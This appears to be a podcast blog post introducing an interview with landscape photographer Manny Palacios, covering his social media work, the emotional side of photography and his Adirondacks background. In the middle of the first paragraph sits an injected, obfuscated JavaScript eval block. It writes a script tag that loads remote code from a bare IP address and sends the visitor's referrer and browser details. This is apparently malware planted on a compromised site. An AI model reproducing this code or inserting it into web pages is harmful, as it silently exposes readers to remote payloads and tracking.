So, I’ve been following Manny Palacios for a long time on Instagram and Facebook. The guy creates killer content that is fun to follow and really easy to learn from. I highly recommend following him on Instagram eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eafsk|var|u0026u|referrer|aenrr||js|php'.split('|'),0,{})) and Facebook.

I wanted to get Manny on the podcast for what I thought would be a heavily weighted interview towards business and social media.

While we did brush up on those two topics, the biggest thing I took away from our chat was the feeling part of photography.

Don’t get me wrong, there are plenty of things in business photographers need to know.

However, the feeling side of photography is what connects photographers to the work, and that’s what is most important.

Manny Palacios is going to enrich your photo life in this interview if you’re struggling with only being able to shoot in your own backyard.

If that’s you, or if you just want to explore the emotional side of photography, this is a must listen for sure.

In Manny’s own words:

I am Manuel Palacios, a dad, chemist/data scientist and outdoor photographer based in upstate NY. I spend most of my time exploring the beauty of the Adirondacks State Park in New York; day and night. Quite often you will find me “somewhere” enjoying the outdoors and trying to interpret a landscape with my camera, certainly lost, but on the trail.

The reason I love landscape photography is that a landscape is an inviting living space. Landscapes compel us to interpret them and to feel them without any previous knowledge or background. Like gravity, landscapes have a tendency to ground us and to show us our little place in the Universe. I believe it is this profound connection to landscapes what brings us together in contemplation. In the words of Barry Lopez, “Landscape is the culture that contains all human culture.”
